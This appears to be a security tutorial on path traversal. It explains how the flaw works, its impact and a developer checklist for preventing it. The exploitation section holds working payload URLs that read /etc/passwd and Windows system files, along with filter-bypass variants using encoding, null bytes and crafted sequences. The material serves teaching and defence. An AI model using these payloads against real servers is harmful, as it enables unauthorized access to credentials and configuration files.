Path Traversal

Also known as Directory Traversal, it is a web vulnerability that allows attackers to access files and directories stored outside the intended directory root of a web application, by manipulating file path inputs, “traversing” the file system, and gaining access to sensitive resources, including configuration files, source code, authentication credentials, or even system binaries.

Common types of Path Traversal are:

• Use of escape sequences to reach an intended directory

• Encoding traversal sequences to bypass naive filters

• Windows-specific traversal where backslashes are used instead of forward slashes

• Abusing null bytes on older systems to bypass extension filters

• Traversal inside Zip/Tar compressed files containing malicious entries that could overwrite arbitrary files when extracted

Scope

Since the actual traversal happens on the server’s file system, it is a server-side vulnerability that arises from improper handling or sanitization of user-supplied input when building file paths.

This vulnerability often overlaps with Information Disclosure, since its primary purpose is usually to extract sensitive data.

Some common scenarios are in file download portals, image rendering, log viewers, web shells, or misconfigured file upload systems.

Exploitation Techniques

Path Traversal abuses the user input to construct file system paths that are not being sanitized properly, and could bypass filters and specialized libraries.

Reading Arbitrary Files

We could try to read files outside of the location of a resource by modifying the point where these are being called.

• We check for parameters in the URL or HTML labels that call the name of a file or its path, and then we try to jump between directories using relative route sequences and read other system files

# The vulnerable point calling a file
http://$url/$query?$param=hola.php

# We use ../ to get to the root directory
http://$url/$query?$param=../../../../../etc/passwd

# This could also work on Windows systems
http://$url/$query?$param=..\..\..\..\..\..\WINDOWS\system32\drivers\etc\hosts

# And in HTML labels
<img src="/loadImage?filename=../../../../../etc/passwd">

It is useful to put as many ../ or ..\ as possible to get to the root folder

---

Bypassing Input Filters

Sometimes, we will need to check the source code (if possible) to look for any input validations that are not efficient and could be bypassed. In this, we can find various cases.

• If filtering the ../ or ..\ strings, we could use other combinations to bypass this verification, even when doing replacements

Example PHP code

...
$file = str_replace( array( "../", "..\\" ), "", $file );
...

Bypass Payload

http://$url/$query?$param=..\/..\/..\/..\/etc/passwd

# In case of literal replacement, we could trick the code to leave ../ at last
http://$url/$query?$param=..././..././..././..././etc/passwd
http://$url/$query?$param=....//....//....//etc/passwd

---

• In other cases, the code could only validate files whose name starts with a specific value

Example source code

...
if( !fnmatch( "file*", $file ) && $file != "include.php" ) {
...

Bypass Payload

# Using the specific name or path at the start could trick this validation
http://$url/$query?$param=file/../../../../etc/passwd
http://$url/$query?$param=/var/www/images/../../../../etc/passwd

---

• Also, when traversing sequences are banned, we can URL encode or even double URL encode the respective characters

http://$url/$query?$param=../../../etc/passwd # This don't work
http://$url/$query?$param=..%2f..%2f..%2fetc%2fpasswd # But this could
http://$url/$query?$param=..%252f..%252f..%252fetc%252fpasswd # Or even this

---

• If needed to end with an expected file extension, we can use a null byte (%00) to bypass it

http://$url/$query?$param=../../../etc/passwd%00.png   

---

We could also automate the process of finding correct payloads using Burp Suite Intruder, which provides a predefined payload list named Fuzzing - path traversal

Null Byte Poisoning

To bypass input filtering or validation mechanisms in web applications or other systems, we could insert a null byte in URL encoding (%00) or in hexadecimal (\x00) to terminate strings, and provoke validations to misbehave.

• When accessing a resource gives us a 403 error, and the site tells us that only certain types or extensions are allowed to be requested, we could use a null byte to bypass these restrictions

http://$url/$query?$param=../../../etc/passwd.png # Returns Forbidden Access
http://$url/$query?$param=../../../etc/passwd%00.png # But this could work

---

• We could also URL-encode the % to bypass some filters

http://$url/$query?$param=../../../etc/passwd%2500.png 

---

• It is also possible to modify the hex data of a request directly and add a null hex byte in the corresponding position of the extension

00000000  47 45 54 20 2F 71 75 65  72 79 3F 70 61 74 68 3D  GET /query?path=
00000010  2E 2E 2F 2E 2E 2F 2E 2E  2F 65 74 63 2F 70 61 73  ../../../etc/pas
00000020  73 77 64 41 2E 70 6E 67  20 20 48 54 54 50 2F 31  swdA.png  HTTP/1
00000030  2E 31 0D 0A 48 6F 73 74  3A 20 65 78 61 6D 70 6C  .1  Host: exampl
00000040  65 2E 63 6F 6D                                    e.com

In this case, we replace the A that we have put as a reference, with the 00 byte

Impact

• Confidentiality breach exposing sensitive system or application files

• Integrity risk in special cases where files on the server can be overwritten

• Authentication compromise where credentials, tokens, or private keys could be accessed

• Exposure of configuration files that could lead to database compromise, lateral movement, or pivoting

• Arbitrary code execution when combined with other vulnerabilities like LFI or File Uploads

Mitigation Strategies

• Avoid passing user-supplied input to filesystem APIs and manually concatenating paths

• Validate the user input before processing it and use whitelists of permitted values

• Sanitize input by allowing only expected characters, like alphanumeric, no dots, slashes, or protocols

• Reject input containing sequences like ../ or encoded equivalents.

• Ensure proper file path resolution and canonicalize the path (turn relative paths by resolving symbolic links and turning them into their absolute equivalent)

• Restrict access so that even if traversal happens, the attacker cannot leave the intended directory.

• Run web servers with minimal permissions so sensitive files remain inaccessible.

• Only allow specific extensions and check using MIME types, not just string endings

Checklist for Developers and Sysadmins

• Do not concatenate user input directly into file paths

• Always normalize and canonicalize paths before accessing files

• Use strict whitelists for allowed files and directories

• Verify both the filename and the extension against allowed patterns

• Restrict file access using OS-level permissions

• Deploy applications inside containers or jail environments

• Sanitize logs and error messages to avoid leaking sensitive path info

• Regularly test with automated tools (SAST/DAST) and manual penetration testing